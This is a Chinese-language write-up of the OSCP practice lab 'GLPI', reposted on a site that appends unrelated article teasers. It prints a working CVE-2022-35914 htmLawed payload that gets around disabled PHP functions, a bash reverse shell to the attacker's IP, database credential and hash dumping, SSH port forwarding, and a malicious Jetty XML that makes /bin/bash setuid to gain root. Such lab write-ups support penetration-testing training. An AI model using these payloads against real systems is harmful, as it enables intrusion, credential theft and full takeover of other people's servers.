OSCP靶场--GLPI

OSCP靶场–GLPI

考点(CVE-2022-35914 php执行函数绕过+ssh端口转发+jetty xml RCE)

1.nmap扫描(ssh端口转发)

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.194.242 -sV -sC --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-26 22:22 EDT
Nmap scan report for 192.168.194.242
Host is up (0.37s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Authentication - GLPI
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.45 seconds

2.user priv

## 目录扫描:┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.194.242
[22:26:05] 200 -   40KB - /CHANGELOG.md   ## 目录扫描,发现changelog,比对版本,发现版本号,查出公共exp,需要密码,密码弱密码尝试,默认密码尝试失败:
## google搜索发现未授权rce:
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh
https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/###
## exec无输出,查看phpinfo发现exec函数被禁用:
┌──(root㉿kali)-[~/Desktop]
└─# curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://192.168.194.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'##
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd##
## 反弹shell:
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=system&spec[0]=&spec[1]=bash -c 'bash -i >& /dev/tcp/192.168.45.171/80 0>&1'####################
## 发现数据库凭据:
www-data@glpi:/var/www/glpi/config$ cat config_db.php
cat config_db.php
<?php
class DB extends DBmysql {public $dbhost = 'localhost';public $dbuser = 'glpi';public $dbpassword = 'glpi_db_password';public $dbdefault = 'glpi';public $use_utf8mb4 = true;public $allow_myisam = false;public $allow_datetime = false;public $allow_signed_keys = false;
}####################
## 提升shell并且连接mysql:
┌──(root㉿kali)-[~/Desktop]
└─# sudo rlwrap -cAr nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.178.242] 40028
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ python3 -c 'import pty;pty.spawn("bash")'
<htmlawed$ python3 -c 'import pty;pty.spawn("bash")'  
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ 
zsh: suspended  sudo rlwrap -cAr nc -lvnp 80┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo; fg          
[1]  + continued  sudo rlwrap -cAr nc -lvnp 80
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ mysql -u glpi -p
mysql -u glpi -p
Enter password: glpi_db_passwordWelcome to the MySQL monitor.  Commands end with ; or \g.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> 
mysql> select id,name,password from glpi_users;
select id,name,password from glpi_users;
+----+-------------+--------------------------------------------------------------+
| id | name        | password                                                     |
+----+-------------+--------------------------------------------------------------+
|  2 | glpi        | $2y$10$9DbdMovtCw0eI.FWm18SRu34ErQD6LUzA8AqGUqiEat0S/ahlyHFa |
|  3 | post-only   | $2y$10$dTMar1F3ef5X/H1IjX9gYOjQWBR1K4bERGf4/oTPxFtJE/c3vXILm |
|  4 | tech        | $2y$10$.xEgErizkp6Az0z.DHyoeOoenuh0RcsX4JapBk2JMD6VI17KtB1lO |
|  5 | normal      | $2y$10$Z6doq4zVHkSPZFbPeXTCluN1Q/r0ryZ3ZsSJncJqkN3.8cRiN0NV. |
|  6 | glpi-system |                                                              |
|  7 | betty       | $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa |
+----+-------------+--------------------------------------------------------------+
6 rows in set (0.00 sec)## cat /etc/passwd | grep -v nogloin发现betty用户:
## 破解betty的hash:$2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa## 破解失败:
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:57 0.33% (ETA: 2024-03-29 02:25) 0g/s 105.8p/s 105.8c/s 105.8C/s honda04..grethel######################
## 查询mysql中含有某字段的所有表:
SELECT TABLE_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'your_column_name' AND TABLE_SCHEMA = 'your_database_name';## 查询其他表数据:发现敏感信息:betty:SnowboardSkateboardRoller234
mysql> sselect * from glpi_itilfollowups;
select * from glpi_itilfollowups;
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
| id | itemtype | items_id | date                | users_id | users_id_editor | content                                                                                                                                                                                                                                                 | is_private | requesttypes_id | date_mod            | date_creation       | timeline_position | sourceitems_id | sourceof_items_id |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
|  1 | Ticket   |        1 | 2022-10-08 20:57:14 |        2 |               0 | &#60;p&#62;Hello Betty,&#60;/p&#62;
&#60;p&#62;i changed your password to : SnowboardSkateboardRoller234&#60;/p&#62;
&#60;p&#62;Please change it again as soon as you can.&#60;/p&#62;
&#60;p&#62;regards.&#60;/p&#62;
&#60;p&#62;Lucas&#60;/p&#62; |          0 |               1 | 2022-10-08 20:57:14 | 2022-10-08 20:57:14 |                 4 |              0 |                 0 |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+##
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ su betty
su betty
Password: SnowboardSkateboardRoller234$ id
id
uid=1000(betty) gid=1000(betty) groups=1000(betty)
$ whoami
whoami
betty
$ cat /home/betty/local.txt
cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0
$ 

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
注意事项:
在这里插入图片描述

在这里插入图片描述

3. root priv

## linpeas枚举:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                 
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                                                             
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -     ###########
## ssh本地端口转发:
ssh -L 1234:localhost:8080 betty@192.168.178.242 -N##
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce## 上传恶意xml反弹shell:
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------##
<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler"><Call class="java.lang.Runtime" name="getRuntime"><Call name="exec"><Arg><Array type="String"><Item>/tmp/root.sh</Item></Array></Arg></Call></Call>
</Configure>###
betty@glpi:/opt/jetty/jetty-base$ echo "chmod +s /bin/bash" > /tmp/root.sh
echo "chmod +s /bin/bash" > /tmp/root.sh
betty@glpi:/opt/jetty/jetty-base$ chmod +x /tmp/root.sh## 在jetty webroot目录下写入xml:
$ wget http://192.168.45.171/rooted.xml
--2024-03-27 11:02:54--  http://192.168.45.171/rooted.xml
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 464 [application/xml]
Saving to: ‘rooted.xml’rooted.xml                         100%[=============================================================>]     464  --.-KB/s    in 0s      2024-03-27 11:02:55 (27.4 MB/s) - ‘rooted.xml’ saved [464/464]$ ls
rooted.xml  root.xml
$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
$ bash -p
bash-5.0# id
uid=1000(betty) gid=1000(betty) euid=0(root) egid=0(root) groups=0(root),1000(betty)######
##
bash-5.0# cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0bash-5.0# cat /root/proof.txt
1063fa4253b657156458c71f4a7847b7

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4.总结:

## writeup:
https://medium.com/@ardian.danny/oscp-practice-series-17-proving-grounds-glpi-555ce2d9234e
https://r4j3sh.medium.com/glpi-pg-practice-writeup-853aff88151f##
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/573001.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于Rflysim平台的无人机拦截三维比例导引算法仿真

【后厂村路钢铁侠出品】 一、Rflysim简介 RflySim是一套专为科研和教育打造的Pixhawk /PX4 和MATLAB/Simulink生态系统或工具链&#xff0c;采用基于模型设计&#xff08;Model-Based Design&#xff0c; MBD&#xff09;的思想&#xff0c;可用于无人系统的控制和安全测试。…

nginx代理服务后,有关文件的操作无法执行,nginx代理jupyter或为知笔记后无法创建文件及文件夹,无法操作文件

nginx配置 server {listen 18001; # 修改转发的接口listen [::]:18001; # 修改转发的接口server_name _;root /usr/share/nginx/html;location / {proxy_pass http://127.0.0.1:7777; # 指定自己服务地址proxy_set_header Host $host;}# Load configurat…

react+redux完成登录页面及token的存取和登录保持

reactredux完成登录页面及token的存取和路由守卫 关于登录页面&#xff0c;我在写vue项目的时候&#xff0c;写了很多篇博客来记录。原因是登录确实比较复杂&#xff0c;涉及前后端联调、全局数据管理、浏览器本地存储等多个环节的技术。框架换成react后&#xff0c;逻辑是一样…

虹科Pico汽车示波器 | 免拆诊断案例 | 2018款东风风神AX7车发动机怠速抖动、加速无力

一、故障现象 一辆2018款东风风神AX7车&#xff0c;搭载10UF01发动机&#xff0c;累计行驶里程约为5.3万km。该车因发动机怠速抖动、加速无力及发动机故障灯异常点亮而进厂维修&#xff0c;维修人员用故障检测仪检测&#xff0c;提示气缸3失火&#xff1b;与其他气缸对调点火线…

【Flink架构】关于FLink BLOB的组织架构:FLIP-19: Improved BLOB storage architecture:官网解读

文章目录 一. BlobServer架构1.BlobClient2. BlobServer3. BlobCache4. LibraryCacheManager 二、BLOB的生命周期1. 分阶段清理2. BlobCache的生命周期3. BlobServer 三、文件上下载流程1. BlobCache 下载2. BlobServer 上传3. BlobServer 下载 四. Flink中支持的BLOB文件类型1…

electron打包桌面版.exe之vue项目踩坑(vue3+electron 解决打包后首页打开空白,打包后路由不跳转及请求不到后端数据等问题)

vue项目https://www.qingplus.cn/components-web/index打包桌面版问题集合 一、静态资源加载问题 npm run electron_dev桌面版运行后页面空白&#xff0c;内容未加载。 填坑&#xff1a; 打包配置要用相对路径 vite.config.ts文件中的base要改成./&#xff0c;之前加了项目…

AWS基础网络产品及协同架构-Networking

简介 一个完整的AWS网络架构图&#xff0c;包含了如下能力&#xff1a; Users (用户): 表示使用AWS服务的用户或系统。 SaaS (软件即服务): 表示在AWS上运行的软件服务&#xff0c;如企业微信可能作为SaaS提供。 example.com?: 这可能是一个示例域名&#xff0c;用于展示如何…

ES面试题

1、如何同步索引库 同步调用 在完成数据库操作后&#xff0c;直接调用搜索服务提供的接口 异步通知 在完成数据库操作后&#xff0c;发送MQ消息 搜索服务监听MQ&#xff0c;接收到消息后完成数据修改 监听binlog 2、分词器 ik分词器 ik_smart ik_max_word 自定义分词器 以拼…

Zookeeper的系统架构

先看一张图&#xff1a; ZooKeeper 的架构图中我们需要了解和掌握的主要有&#xff1a; 1&#xff1a; ZooKeeper分为服务器端&#xff08;Server&#xff09; 和客户端&#xff08;Client&#xff09;&#xff0c;客户端可以连接到整个ZooKeeper服务的任意服务器上&#xff…

ADC+DMA

接线图 这个部分的数据转运是在STM32内部进行的&#xff0c;无需其他外加模块&#xff0c;首先印证一下定义的数据是否储存在相应的地址区间里。

华为CLI实验-配置旁路检测时的安全策略

CLI举例&#xff1a;配置旁路检测时的安全策略 举例说明当FW作为旁路检测设备时&#xff0c;如何配置安全策略。 组网需求 如图1所示&#xff0c;企业内网通过路由器Router连接到Internet。FW作为旁路检测设备&#xff0c;对通过Router的流量进行内容安全检测。 图1 旁路检测…

UniRepLKNet:一种用于音频、视频、点云、时间序列和图像识别的通用感知大核卷积神经网络

论文: https://arxiv.org/abs/2311.15599 模型: https://huggingface.co/DingXiaoH/UniRepLKNet/tree/main 主页&#xff1a;https://invictus717.github.io/UniRepLKNet/ contribution 提出了四条guide line用于设计大核CNN架构模型&#xff0c;用于图像识别&#xff0c;语…